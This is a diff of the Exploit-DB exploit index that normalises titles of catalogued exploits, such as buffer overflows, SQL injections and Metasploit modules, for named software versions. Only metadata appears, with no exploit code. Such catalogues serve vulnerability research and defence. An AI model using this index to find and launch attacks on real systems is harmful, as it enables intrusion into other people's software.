18738,platforms/php/remote/18738.rb,"V-CMS - Arbitrary .PHP File Upload / Execution (Metasploit)",2012-04-14,Metasploit,php,remote,0 @@ -16247,13 +16247,13 @@ id,file,description,date,author,platform,type,port 18756,platforms/multiple/dos/18756.txt,"OpenSSL - ASN1 BIO Memory Corruption",2012-04-19,"Tavis Ormandy",multiple,dos,0 18757,platforms/windows/dos/18757.txt,"VideoLAN VLC Media Player 2.0.1 - '.mp4' Crash (PoC)",2012-04-19,"Senator of Pirates",windows,dos,0 18758,platforms/multiple/dos/18758.txt,"Wireshark - 'call_dissector()' Null Pointer Dereference Denial of Service",2012-04-19,Wireshark,multiple,dos,0 -18759,platforms/windows/remote/18759.rb,"TFTP Server for Windows 1.4 - ST WRQ Buffer Overflow (Metasploit)",2012-04-20,Metasploit,windows,remote,0 +18759,platforms/windows/remote/18759.rb,"TFTP Server 1.4 (Windows) - ST WRQ Buffer Overflow (Metasploit)",2012-04-20,Metasploit,windows,remote,0 18760,platforms/windows/local/18760.rb,"xRadio 0.95b - Buffer Overflow (Metasploit)",2012-04-20,Metasploit,windows,local,0 18761,platforms/linux/remote/18761.rb,"Adobe Flash Player - ActionScript Launch Command Execution (Metasploit)",2012-04-20,Metasploit,linux,remote,0 18772,platforms/php/webapps/18772.txt,"Havalite CMS 1.0.4 - Multiple Vulnerabilities",2012-04-23,Vulnerability-Lab,php,webapps,0 18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x - WebDAV File Reading",2012-04-22,"Jelmer Kuperus",multiple,remote,0 18764,platforms/windows/webapps/18764.txt,"Oracle GlassFish Server 3.1.1 (build 12) - Multiple Cross-Site Scripting",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 -18765,platforms/windows/dos/18765.txt,"samsung net-i ware 1.37 - Multiple Vulnerabilities",2012-04-22,"Luigi Auriemma",windows,dos,0 +18765,platforms/windows/dos/18765.txt,"Samsung NET-i ware 1.37 - Multiple Vulnerabilities",2012-04-22,"Luigi Auriemma",windows,dos,0 18766,platforms/windows/webapps/18766.txt,"Oracle GlassFish Server - REST Cross-Site Request Forgery",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 18768,platforms/php/webapps/18768.txt,"Mega File Manager - File Download",2012-04-22,"i2sec-Min Gi Jo",php,webapps,0 18780,platforms/windows/remote/18780.rb,"Microsoft Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027)",2012-04-25,Metasploit,windows,remote,0 @@ -16378,7 +16378,7 @@ id,file,description,date,author,platform,type,port 18927,platforms/php/webapps/18927.txt,"SocialEngine 4.2.2 - Multiple Vulnerabilities",2012-05-25,i4k,php,webapps,0 18929,platforms/windows/remote/18929.rb,"RabidHamster R4 - Log Entry sprintf() Buffer Overflow (Metasploit)",2012-05-25,Metasploit,windows,remote,0 18950,platforms/php/webapps/18950.txt,"NewsAdd 1.0 - Multiple SQL Injections",2012-05-30,WhiteCollarGroup,php,webapps,0 -18931,platforms/ios/dos/18931.rb,"iOS 5.1.1 - Safari Browser - JS match() & search() Crash (PoC)",2012-05-25,"Alberto Ortega",ios,dos,0 +18931,platforms/ios/dos/18931.rb,"Apple iOS 5.1.1 - Safari Browser - JS match() & search() Crash (PoC)",2012-05-25,"Alberto Ortega",ios,dos,0 18933,platforms/windows/remote/18933.rb,"quickshare file share 1.2.1 - Directory Traversal (2)",2012-05-27,Metasploit,windows,remote,0 18934,platforms/php/webapps/18934.rb,"WeBid - converter.php Remote PHP Code Injection (Metasploit)",2012-05-27,Metasploit,php,webapps,0 18935,platforms/php/webapps/18935.txt,"b2ePms 1.0 - Multiple SQL Injection Vulnerabilities",2012-05-27,loneferret,php,webapps,0 @@ -16411,7 +16411,7 @@ id,file,description,date,author,platform,type,port 18965,platforms/php/webapps/18965.html,"4PSA VoIPNow Professional 2.5.3 - Multiple Vulnerabilities",2012-06-01,Aboud-el,php,webapps,0 18969,platforms/windows/remote/18969.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020002 Buffer Overflow (Metasploit)",2012-06-01,Metasploit,windows,remote,0 18972,platforms/windows/dos/18972.txt,"Irfanview 4.33 - Format PlugIn TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0 -18973,platforms/windows/remote/18973.rb,"GIMP - script-fu Server Buffer Overflow (Metasploit)",2012-06-02,Metasploit,windows,remote,0 +18973,platforms/windows/remote/18973.rb,"GIMP script-fu - Server Buffer Overflow (Metasploit)",2012-06-02,Metasploit,windows,remote,0 18974,platforms/php/webapps/18974.txt,"Vanilla Forum Tagging Plugin Enchanced 1.0.1 - Persistent Cross-Site Scripting",2012-06-02,"Henry Hoggard",php,webapps,0 18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog 2.07.16 - Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0 18987,platforms/php/webapps/18987.php,"WordPress Plugin WP-Property 1.35.0 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 @@ -16789,7 +16789,7 @@ id,file,description,date,author,platform,type,port 19394,platforms/asp/webapps/19394.txt,"Parodia 6.8 - employer-profile.asp SQL Injection",2012-06-25,"Carlos Mario Penagos Hollmann",asp,webapps,0 19398,platforms/php/webapps/19398.txt,"WordPress Plugin Fancy Gallery 1.2.4 - Arbitrary File Upload",2012-06-25,"Sammy FORGIT",php,webapps,0 19408,platforms/php/webapps/19408.txt,"Zend Framework - Local File Disclosure",2012-06-27,"SEC Consult",php,webapps,0 -19403,platforms/php/webapps/19403.rb,"SugarCRM 6.3.1 - Unserialize() PHP Code Execution (Metasploit)",2012-06-26,Metasploit,php,webapps,0 +19403,platforms/php/webapps/19403.rb,"SugarCRM CE 6.3.1 - Unserialize() PHP Code Execution (Metasploit)",2012-06-26,Metasploit,php,webapps,0 29039,platforms/windows/dos/29039.py,"Kerio MailServer 5.x/6.x - Remote LDAP Denial of Service",2006-11-15,"Evgeny Legerov",windows,dos,0 19409,platforms/windows/dos/19409.txt,"Sielco Sistemi Winlog 2.07.16 - Multiple Vulnerabilities",2012-06-27,"Luigi Auriemma",windows,dos,0 19414,platforms/windows/dos/19414.c,"Microsoft Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Exploit (2)",1999-07-03,klepto,windows,dos,0 @@ -16810,7 +16810,7 @@ id,file,description,date,author,platform,type,port 19429,platforms/linux/local/19429.sh,"Rational Software ClearCase for Unix 3.2 - ClearCase SUID",1999-05-02,Mudge,linux,local,0 19430,platforms/multiple/local/19430.txt,"GNU groff 1.11 a / HP-UX 10.0/11.0 / SGI IRIX 6.5.3 - Malicious Manpage Vulnerabilities",1999-07-25,"Pawel Wilk",multiple,local,0 19431,platforms/php/webapps/19431.txt,"webERP 4.08.1 - Local / Remote File Inclusion",2012-06-28,dun,php,webapps,0 -19432,platforms/jsp/webapps/19432.rb,"Openfire 3.6.0a - Admin Console Authentication Bypass (Metasploit)",2012-06-28,Metasploit,jsp,webapps,0 +19432,platforms/jsp/webapps/19432.rb,"Openfire Server 3.6.0a - Admin Console Authentication Bypass (Metasploit)",2012-06-28,Metasploit,jsp,webapps,0 19433,platforms/windows/local/19433.rb,"Apple QuickTime - TeXML Stack Buffer Overflow (Metasploit)",2012-06-28,Metasploit,windows,local,0 19434,platforms/osx/local/19434.txt,"Quinn - 'the Eskimo' and Peter N. Lewis Internet Config 1.0/2.0 Weak Password Encryption",1999-07-28,"Dawid adix Adamski",osx,local,0 19435,platforms/windows/remote/19435.html,"Microsoft JET 3.5/3.51/4.0 - VBA Shell",1999-07-29,BrootForce,windows,remote,0 @@ -17008,7 +17008,7 @@ id,file,description,date,author,platform,type,port 19626,platforms/php/webapps/19626.txt,"sflog! 1.00 - Multiple Vulnerabilities",2012-07-06,dun,php,webapps,0 19628,platforms/php/webapps/19628.txt,"Event Script PHP 1.1 CMS - Multiple Vulnerabilities",2012-07-06,Vulnerability-Lab,php,webapps,0 19629,platforms/php/webapps/19629.txt,"Webmatic 3.1.1 - Blind SQL Injection",2012-07-06,"High-Tech Bridge SA",php,webapps,0 -19630,platforms/php/webapps/19630.rb,"Tiki Wiki 8.3 - Unserialize() PHP Code Execution (Metasploit)",2012-07-09,Metasploit,php,webapps,0 +19630,platforms/php/webapps/19630.rb,"Tiki Wiki CMS Groupware 8.3 - Unserialize() PHP Code Execution (Metasploit)",2012-07-09,Metasploit,php,webapps,0 19631,platforms/php/webapps/19631.rb,"Basilic 1.5.14 - diff.php Arbitrary Command Execution (Metasploit)",2012-07-09,Metasploit,php,webapps,0 19632,platforms/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink WebServer - Retrieve Administrator Password",1999-11-17,"Dennis W. Mattison",hardware,remote,0 19633,platforms/windows/local/19633.txt,"Microsoft Windows 95/98/Enterprise Server 4/NT Server 4/Terminal Server 4/Workstation 4 - Riched Buffer Overflow",1999-11-17,"Pauli Ojanpera",windows,local,0 @@ -17057,7 +17057,7 @@ id,file,description,date,author,platform,type,port 19680,platforms/sco/remote/19680.c,"SCO Unixware 7.1 - i2odialogd Remote Buffer Overflow",1999-12-22,"Brock Tellier",sco,remote,0 19681,platforms/solaris/dos/19681.txt,"Solaris 7.0 - DMI Denial of Service",1999-12-22,"Brock Tellier",solaris,dos,0 19682,platforms/novell/remote/19682.txt,"Netscape Enterprise Server_ Novell Groupwise 5.2/5.5 GWWEB.EXE - Multiple Vulnerabilities",1999-12-19,"Sacha Faust Bourque",novell,remote,0 -19683,platforms/windows/local/19683.c,"Ipswitch IMail 5.0/5.0.5/5.0.6/5.0.7/5.0.8/6.0 - Weak Password Encryption",1999-12-19,"Mike Davis",windows,local,0 +19683,platforms/windows/local/19683.c,"Ipswitch IMail Server 5.0/5.0.5/5.0.6/5.0.7/5.0.8/6.0 - Weak Password Encryption",1999-12-19,"Mike Davis",windows,local,0 19684,platforms/multiple/local/19684.c,"SCO Open Server 5.0.5 / IRIX 6.2 ibX11/X11 Toolkit/Athena Widget Library - Buffer Overflows",1999-12-20,"Last Stage of Delirium",multiple,local,0 19685,platforms/freebsd/local/19685.txt,"Windowmaker wmmon 1.0 b2 - Exploit",1999-12-22,"Steve Reid",freebsd,local,0 19686,platforms/multiple/remote/19686.txt,"Microsoft Internet Explorer 4/5/5.5/5.0.1 - external.NavigateAndFind() Cross-Frame",1999-12-22,"Georgi Guninski",multiple,remote,0 @@ -17218,9 +17218,9 @@ id,file,description,date,author,platform,type,port 19844,platforms/cgi/remote/19844.txt,"CNC Technology BizDB 1.0 - bizdb-search.cgi Remote Command Execution",2000-04-13,"PErfecto Technology",cgi,remote,0 19845,platforms/windows/remote/19845.pl,"Microsoft FrontPage 98 Server Extensions for IIS / Microsoft InterDev 1.0 - Filename Obfuscation",2000-04-14,"rain forest puppy",windows,remote,0 19846,platforms/windows/remote/19846.pl,"Microsoft FrontPage 98 Server Extensions for IIS / Microsoft InterDev 1.0 - Buffer Overflow",2000-04-14,"Richie & Beto",windows,remote,0 -19847,platforms/unix/remote/19847.c,"UoW imapd 10.234/12.264 - Buffer Overflow",2002-08-01,"Gabriel A. Maggiotti",unix,remote,0 -19848,platforms/unix/remote/19848.pm,"UoW imapd 10.234/12.264 - LSUB Buffer Overflow (Metasploit)",2000-04-16,vlad902,unix,remote,0 -19849,platforms/unix/remote/19849.pm,"UoW imapd 10.234/12.264 - COPY Buffer Overflow (Metasploit)",2000-04-16,vlad902,unix,remote,0 +19847,platforms/unix/remote/19847.c,"UoW IMAPd Server 10.234/12.264 - Buffer Overflow",2002-08-01,"Gabriel A. Maggiotti",unix,remote,0 +19848,platforms/unix/remote/19848.pm,"UoW IMAPd Server 10.234/12.264 - LSUB Buffer Overflow (Metasploit)",2000-04-16,vlad902,unix,remote,0 +19849,platforms/unix/remote/19849.pm,"UoW IMAPd Serve 10.234/12.264 - COPY Buffer Overflow (Metasploit)",2000-04-16,vlad902,unix,remote,0 19850,platforms/linux/dos/19850.c,"RedHat Linux 6.x - X Font Server Denial of Service / Buffer Overflow Vulnerabilities",2000-04-16,"Michal Zalewski",linux,dos,0 19851,platforms/qnx/local/19851.c,"QSSL QNX 4.25 A - crypt() Exploit",2000-04-15,Sean,qnx,local,0 19852,platforms/cgi/remote/19852.txt,"Dansie Shopping Cart 3.0.4 - Multiple Vulnerabilities",2000-04-14,"tombow & Randy Janinda",cgi,remote,0 @@ -17250,7 +17250,7 @@ id,file,description,date,author,platform,type,port 19876,platforms/solaris/local/19876.c,"Solaris 7.0/8 - Xsun Buffer Overrun",2000-04-24,DiGiT,solaris,local,0 19877,platforms/windows/remote/19877.txt,"FrontPage 98/Personal WebServer 1.0 / Personal Web Server 2.0 - htimage.exe File Existence Disclosure",2000-04-19,Narrow,windows,remote,0 19878,platforms/solaris/local/19878.c,"Solaris 2.6/7.0 - lp -d Option Buffer Overflow",2000-04-24,DiGiT,solaris,local,0 -19879,platforms/linux/remote/19879.txt,"RedHat 6.2 - Piranha Virtual Server Package Default Account and Password",2000-04-24,"Max Vision",linux,remote,0 +19879,platforms/linux/remote/19879.txt,"RedHat 6.2 Piranha Virtual Server Package - Default Account and Password",2000-04-24,"Max Vision",linux,remote,0 19880,platforms/windows/dos/19880.txt,"Symantec pcAnywhere 8.0.1/8.0.2/9.0/9.2 - Port Scan Denial of Service",2000-04-25,Vacuum,windows,dos,0 19881,platforms/windows/remote/19881.txt,"McMurtrey/Whitaker & Associates Cart32 2.6/3.0 - Remote Administration Password",2000-04-27,"Cerberus Security Team",windows,remote,0 19882,platforms/hardware/remote/19882.pl,"Cisco IOS 11.x/12.x - HTTP %% Exploit",2000-04-26,"Keith Woodworth",hardware,remote,0 @@ -17298,7 +17298,7 @@ id,file,description,date,author,platform,type,port 19928,platforms/windows/remote/19928.txt,"Microsoft Active Movie Control 1.0 - Filetype",2000-05-13,http-equiv,windows,remote,0 19965,platforms/multiple/dos/19965.txt,"HP JetAdmin 6.0 - Printing Denial of Service",2000-05-24,"Ussr Labs",multiple,dos,0 19966,platforms/linux/remote/19966.c,"Marty Bochane MDBms 0.9 - xbx Buffer Overflow",2000-05-24,"HaCk-13 TeaM",linux,remote,0 -19930,platforms/windows/local/19930.rb,"Microsoft Windows - Escalate Task Scheduler XML Privilege Escalation (Metasploit)",2012-07-19,Metasploit,windows,local,0 +19930,platforms/windows/local/19930.rb,"Microsoft Windows - Task Scheduler XML Privilege Escalation (Metasploit)",2012-07-19,Metasploit,windows,local,0 19931,platforms/windows/remote/19931.rb,"Novell ZENworks Configuration Management Preboot Service 0x06 - Buffer Overflow (Metasploit)",2012-07-19,Metasploit,windows,remote,998 19932,platforms/windows/remote/19932.rb,"Novell ZENworks Configuration Management Preboot Service 0x21 - Buffer Overflow (Metasploit)",2012-07-19,Metasploit,windows,remote,998 19933,platforms/linux/local/19933.rb,"Linux Kernel 2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - 'Sendpage' Privilege Escalation (Metasploit)",2012-07-19,Metasploit,linux,local,0 @@ -17321,7 +17321,7 @@ id,file,description,date,author,platform,type,port 19953,platforms/linux/local/19953.c,"S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - fdmount Buffer Overflow (2)",2000-05-22,Scrippie,linux,local,0 19954,platforms/linux/local/19954.c,"S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - fdmount Buffer Overflow (3)",2000-05-22,WaR,linux,local,0 19955,platforms/linux/local/19955.c,"Cobalt RaQ 2.0/3.0 / qpopper 2.52/2.53 - 'EUIDL' Format String Input",2000-05-24,Prizm,linux,local,0 -19956,platforms/cgi/remote/19956.txt,"hp jetadmin 5.5.177/jetadmin 5.6 - Directory Traversal",2000-05-24,"Ussr Labs",cgi,remote,8000 +19956,platforms/cgi/remote/19956.txt,"HP JetAdmin 5.5.177/jetadmin 5.6 - Directory Traversal",2000-05-24,"Ussr Labs",cgi,remote,8000 19957,platforms/windows/remote/19957.txt,"Pacific Software Carello 1.2.1 - File Duplication / Source Disclosure",2000-05-24,"Cerberus Security Team",windows,remote,0 19958,platforms/windows/remote/19958.rb,"Novell ZENworks Configuration Management Preboot Service - 0x6c Buffer Overflow (Metasploit)",2012-07-20,Metasploit,windows,remote,0 19959,platforms/windows/remote/19959.rb,"Novell ZENworks Configuration Management Preboot Service - 0x4c Buffer Overflow (Metasploit)",2012-07-20,Metasploit,windows,remote,998 @@ -17419,7 +17419,7 @@ id,file,description,date,author,platform,type,port 20059,platforms/cgi/remote/20059.txt,"CGI-World Poll It 2.0 - Internal Variable Override",2000-07-04,"Adrian Daminato",cgi,remote,0 20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 - '/INVITE' Format String",2000-07-05,RaiSe,linux,remote,0 20061,platforms/linux/remote/20061.c,"Canna Canna 3.5 b2 - Remote Buffer Overflow",2000-07-02,UNYUN,linux,remote,0 -20062,platforms/php/webapps/20062.py,"Alienvault OSSIM 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection",2012-07-23,muts,php,webapps,0 +20062,platforms/php/webapps/20062.py,"Alienvault OSSIM Open Source SIEM 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection",2012-07-23,muts,php,webapps,0 20063,platforms/windows/webapps/20063.txt,"SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Authenticated SQL Injection",2012-07-23,dookie,windows,webapps,0 20064,platforms/linux/remote/20064.py,"Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion (Root Remote Code Execution)",2012-07-24,muts,linux,remote,0 20065,platforms/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 - File Existence Disclosure",2000-07-08,"Andrew Lewis",windows,remote,0 @@ -17531,10 +17531,10 @@ id,file,description,date,author,platform,type,port 20182,platforms/windows/remote/20182.txt,"Ipswitch IMail 6.x - File Attachment",2000-08-30,Timescape,windows,remote,0 20183,platforms/cgi/remote/20183.pl,"GWScripts News Publisher 1.0 - author.file Write",2000-08-29,n30,cgi,remote,0 20184,platforms/windows/remote/20184.txt,"eEye Digital Security IRIS 1.0.1 / SpyNet CaptureNet 3.0.12 - Buffer Overflow",2000-08-31,"Ussr Labs",windows,remote,0 -20185,platforms/linux/local/20185.c,"RedHat 6 - glibc/locale Subsystem Format String",2000-09-06,warning3,linux,local,0 -20186,platforms/solaris/local/20186.c,"Solaris 2.6/7.0 - /locale Subsystem Format String",2000-11-02,warning3,solaris,local,0 +20185,platforms/linux/local/20185.c,"RedHat 6 GLIBC/locale - Subsystem Format String",2000-09-06,warning3,linux,local,0 +20186,platforms/solaris/local/20186.c,"Solaris 2.6/7.0 /locale - Subsystem Format String",2000-11-02,warning3,solaris,local,0 20187,platforms/immunix/local/20187.c,"Immunix OS 6.2 - LC glibc format string",2000-09-04,"Kil3r of Lam3rZ",immunix,local,0 -20188,platforms/solaris/local/20188.c,"Solaris 2.6/7.0 - 'eject' locale Subsystem Format String",2000-09-08,warning3,solaris,local,0 +20188,platforms/solaris/local/20188.c,"Solaris 2.6/7.0 'eject' locale - Subsystem Format String",2000-09-08,warning3,solaris,local,0 20189,platforms/unix/local/20189.c,"Libc locale - Exploit (1)",2000-09-04,Synnergy.net,unix,local,0 20190,platforms/unix/local/20190.c,"Libc locale - Exploit (2)",2000-09-04,anonymous,unix,local,0 20191,platforms/bsd/local/20191.c,"Juergen Weigert screen 3.9 - User Supplied Format String",2000-09-05,IhaQueR@IRCnet,bsd,local,0 @@ -17643,7 +17643,7 @@ id,file,description,date,author,platform,type,port 20295,platforms/windows/dos/20295.txt,"AOL Products downloadUpdater2 Plugin - SRC Parameter Remote Code Execution",2012-08-06,rgod,windows,dos,0 20296,platforms/windows/local/20296.rb,"CoolPlayer+ Portable 2.19.2 - Buffer Overflow ASLR Bypass (Large Shellcode)",2012-08-06,"Robert Larsen",windows,local,0 20297,platforms/windows/remote/20297.rb,"Oracle AutoVue - ActiveX Control SetMarkupMode Buffer Overflow (Metasploit)",2012-08-06,Metasploit,windows,remote,0 -20302,platforms/windows/remote/20302.pl,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode - Directory Traversal (5)",2000-10-17,"Andrea Spabam",windows,remote,0 +20302,platforms/windows/remote/20302.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (5)",2000-10-17,"Andrea Spabam",windows,remote,0 20303,platforms/cgi/remote/20303.pl,"Oatmeal Studios Mail File 1.10 - Arbitrary File Disclosure",2000-10-11,"Dirk Brockhausen",cgi,remote,0 20304,platforms/windows/dos/20304.txt,"Omnicron OmniHTTPd 1.1/2.0 Alpha 1 - visiadmin.exe Denial of Service",1999-06-05,"Valentin Perelogin",windows,dos,0 20305,platforms/windows/remote/20305.txt,"Microsoft Site Server 2.0 with IIS 4.0 - Arbitrary File Upload",1999-01-30,Mnemonix,windows,remote,0 @@ -17727,7 +17727,7 @@ id,file,description,date,author,platform,type,port 20382,platforms/unix/local/20382.pl,"Debian 2.x / RedHat 6.2 / IRIX 5/6 / Solaris 2.x - Mail Reply-To Field",2000-11-01,"Gregory Duchemin",unix,local,0 20383,platforms/windows/local/20383.txt,"Microsoft IIS 4.0 - ISAPI Buffer Overflow",2000-11-06,"Marc Maiffret",windows,local,0 20384,platforms/windows/remote/20384.txt,"Microsoft IIS 4.0/5.0 - Executable File Parsing",2000-11-06,Nsfocus,windows,remote,0 -20385,platforms/linux/local/20385.sh,"RedHat restore 0.4 b15 - Insecure Environment Variables",2000-11-04,fish,linux,local,0 +20385,platforms/linux/local/20385.sh,"RedHat 0.4 b15 restore - Insecure Environment Variables",2000-11-04,fish,linux,local,0 20386,platforms/hp-ux/local/20386.txt,"HP-UX 10.20 - registrar Local Arbitrary File Read",2000-11-08,"J.A. Gutierrez",hp-ux,local,0 20387,platforms/cgi/remote/20387.txt,"YaBB 9.11.2000 - search.pl Arbitrary Command Execution",2000-11-07,rpc,cgi,remote,0 20388,platforms/linux/dos/20388.txt,"BIND 8.2.2-P5 - Denial of Service",2000-11-01,"Fabio Pietrosanti",linux,dos,0 @@ -17823,7 +17823,7 @@ id,file,description,date,author,platform,type,port 20482,platforms/novell/remote/20482.txt,"Novell Netware Web Server 3.x - files.pl Exploit",1998-12-01,anonymous,novell,remote,0 20483,platforms/cgi/remote/20483.txt,"WEBgais 1.0 - websendmail Remote Command Execution",1997-07-04,"Razvan Dragomirescu",cgi,remote,0 20484,platforms/windows/dos/20484.txt,"OReilly WebSite 1.x/2.0 - win-c-sample.exe Buffer Overflow",1997-01-06,"Solar Designer",windows,dos,0 -20485,platforms/osx/local/20485.sh,"Viscosity OpenVPN Client (OSX) - Privilege Escalation",2012-08-13,zx2c4,osx,local,0 +20485,platforms/osx/local/20485.sh,"Viscosity - Privilege Escalation",2012-08-13,zx2c4,osx,local,0 20486,platforms/unix/remote/20486.html,"Matt Wright FormMail 1.x - Cross-Site Request Forgery",1997-01-01,anonymous,unix,remote,0 20487,platforms/hardware/dos/20487.pl,"Watchguard SOHO 2.2 - Denial of Service",2000-12-08,"Filip Maertens",hardware,dos,0 20488,platforms/windows/remote/20488.txt,"MetaProducts Offline Explorer 1.x - File System Disclosure",2000-12-07,Dodger,windows,remote,0 @@ -17855,8 +17855,8 @@ id,file,description,date,author,platform,type,port 20517,platforms/linux/local/20517.c,"Itetris 1.6.1/1.6.2 - Privileged Arbitrary Command Execution",2000-12-19,V9,linux,local,0 20518,platforms/windows/dos/20518.txt,"Infinite Interchange 3.61 - Denial of Service",2000-12-21,"SNS Research",windows,dos,0 20519,platforms/multiple/remote/20519.c,"Check Point Software Firewall-1 4.1 SP2 - Fast Mode TCP Fragment",2000-12-14,"Thomas Lopatic",multiple,remote,0 -20520,platforms/solaris/local/20520.pl,"Solaris 2.x/7.0/8 catman - Race Condition (1)",2000-11-21,"Vapid Labs",solaris,local,0 -20521,platforms/solaris/local/20521.pl,"Solaris 2.x/7.0/8 catman - Race Condition (2)",2000-11-21,"Vapid Labs",solaris,local,0 +20520,platforms/solaris/local/20520.pl,"Solaris 2.x/7.0/8 Catman - Race Condition (1)",2000-11-21,"Vapid Labs",solaris,local,0 +20521,platforms/solaris/local/20521.pl,"Solaris 2.x/7.0/8 Catman - Race Condition (2)",2000-11-21,"Vapid Labs",solaris,local,0 20522,platforms/cgi/remote/20522.txt,"Technote 2000/2001 - 'board' Function File Disclosure",2000-12-23,bt,cgi,remote,0 20523,platforms/cgi/remote/20523.pl,"Technote 2000/2001 - 'Filename' Parameter Command Execution And File Disclosure",2000-12-27,Ksecurity,cgi,remote,0 20524,platforms/cgi/remote/20524.txt,"Brian Stanback bsguest.cgi 1.0 - Remote Command Execution",2000-12-20,rivendell_team,cgi,remote,0 @@ -17877,7 +17877,7 @@ id,file,description,date,author,platform,type,port 20539,platforms/php/webapps/20539.txt,"MobileCartly 1.0 - Arbitrary File Upload",2012-08-15,ICheer_No0M,php,webapps,0 20706,platforms/linux/webapps/20706.rb,"Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change (Metasploit)",2012-08-21,Kc57,linux,webapps,0 20541,platforms/php/webapps/20541.txt,"MaxForum 1.0.0 - Local File Inclusion",2012-08-15,ahwak2000,php,webapps,0 -20705,platforms/multiple/dos/20705.py,"sap NetWeaver dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities",2012-08-21,"Core Security",multiple,dos,0 +20705,platforms/multiple/dos/20705.py,"SAP NetWeaver Dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities",2012-08-21,"Core Security",multiple,dos,0 20704,platforms/php/webapps/20704.txt,"Clipbucket 2.5 - Directory Traversal",2012-08-21,loneferret,php,webapps,0 20544,platforms/php/webapps/20544.txt,"xt:Commerce 3.04 SP2.1 - Time Based Blind SQL Injection",2012-08-15,stoffline.com,php,webapps,0 20545,platforms/windows/webapps/20545.txt,"Cyclope Employee Surveillance Solution 6.0 6.1.0 6.2.0 - Multiple Vulnerabilities",2012-08-15,loneferret,windows,webapps,0 @@ -17913,7 +17913,7 @@ id,file,description,date,author,platform,type,port 20576,platforms/php/webapps/20576.txt,"Inferno vBShout 2.5.2 - SQL Injection",2012-08-17,Luit,php,webapps,0 20644,platforms/hardware/dos/20644.c,"Marconi ASX-1000 - Administration Denial of Service",2001-02-19,"J.K. Garvey",hardware,dos,0 20578,platforms/php/webapps/20578.pl,"hastymail2 webmail 1.1 rc2 - Persistent Cross-Site Scripting",2012-08-17,"Shai rod",php,webapps,0 -20579,platforms/php/webapps/20579.py,"T-dah Webmail - Multiple Persistent Cross-Site Scripting",2012-08-17,"Shai rod",php,webapps,0 +20579,platforms/php/webapps/20579.py,"T-dah Webmail Client - Multiple Persistent Cross-Site Scripting",2012-08-17,"Shai rod",php,webapps,0 20580,platforms/php/webapps/20580.txt,"webid 1.0.4 - Multiple Vulnerabilities",2012-08-17,dun,php,webapps,0 20612,platforms/windows/remote/20612.txt,"informs picserver 1.0 - Directory Traversal",2001-02-05,joetesta,windows,remote,0 20581,platforms/linux/local/20581.c,"Mysql 3.22.x/3.23.x - Local Buffer Overflow",2001-01-18,"Luis Miguel Silva",linux,local,0 @@ -18050,7 +18050,7 @@ id,file,description,date,author,platform,type,port 20724,platforms/hp-ux/local/20724.txt,"Shareplex 2.1.3.9/2.2.2 Beta - Arbitrary Local File Disclosure",2001-03-30,"Dixie Flatline",hp-ux,local,0 20725,platforms/cgi/remote/20725.txt,"Microburst uStorekeeper 1.x - Arbitrary Commands",2001-04-02,"UkR hacking team",cgi,remote,0 20726,platforms/windows/remote/20726.pl,"Gene6 BPFTP Server 2.0 - File Existence Disclosure",2001-04-03,"Rob Beck",windows,remote,0 -20727,platforms/linux/remote/20727.c,"Ntpd - Remote Buffer Overflow",2001-04-04,"babcia padlina ltd",linux,remote,0 +20727,platforms/linux/remote/20727.c,"NTPd - Remote Buffer Overflow",2001-04-04,"babcia padlina ltd",linux,remote,0 20728,platforms/windows/dos/20728.txt,"602Pro Lan Suite 2000a - Long HTTP Request Denial of Service",2001-04-05,nitr0s,windows,dos,0 20729,platforms/php/webapps/20729.txt,"PHP-Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change",2001-04-02,"Juan Diego",php,webapps,0 20730,platforms/unix/remote/20730.c,"IPFilter 3.x - Fragment Rule Bypass",2001-04-09,"Thomas Lopatic",unix,remote,0 @@ -18348,7 +18348,7 @@ id,file,description,date,author,platform,type,port 21033,platforms/hardware/webapps/21033.txt,"Sitecom Home Storage Center - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0 21034,platforms/windows/remote/21034.rb,"SAP NetWeaver Dispatcher - DiagTraceR3Info Buffer Overflow (Metasploit)",2012-09-07,Metasploit,windows,remote,3200 21035,platforms/windows/remote/21035.txt,"SnapStream PVS 1.2 - Plaintext Password",2001-07-26,John,windows,remote,0 -21036,platforms/windows/remote/21036.pl,"Ipswitch WS_FTP 2.0 - Anonymous Multiple FTP Command Buffer Overflow",2001-07-25,andreas,windows,remote,0 +21036,platforms/windows/remote/21036.pl,"Ipswitch WS_FTP Server 2.0 - Anonymous Multiple FTP Command Buffer Overflow",2001-07-25,andreas,windows,remote,0 21037,platforms/linux/remote/21037.c,"GNU groff 1.1x - xploitation Via LPD",2001-06-23,zen-parse,linux,remote,0 21038,platforms/php/webapps/21038.txt,"PHP-Nuke 5.0 - 'user.php' Form Element Substitution",2001-07-27,dinopio,php,webapps,0 21039,platforms/windows/remote/21039.pl,"SimpleServer:WWW 1.0.7/1.0.8/1.13 - Hex Encoded URL Directory Traversal",2001-07-26,THRAN,windows,remote,0 @@ 